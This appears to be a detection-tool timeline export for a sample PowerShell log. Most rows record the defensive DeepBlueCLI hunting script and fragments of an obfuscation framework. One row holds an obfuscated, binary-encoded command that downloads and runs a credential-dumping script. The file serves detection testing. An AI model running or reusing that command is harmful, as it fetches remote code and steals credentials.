"""" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.265 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent 
error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.275 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:04.659 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:04.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:04.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:09.364 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:52.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:52.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.968 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.973 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.976 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.978 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.981 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:53.991 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:54.000 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:54.036 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:54.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:56.644 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:56.651 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:55:56.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:09.115 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:09.116 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:33.244 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.464 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
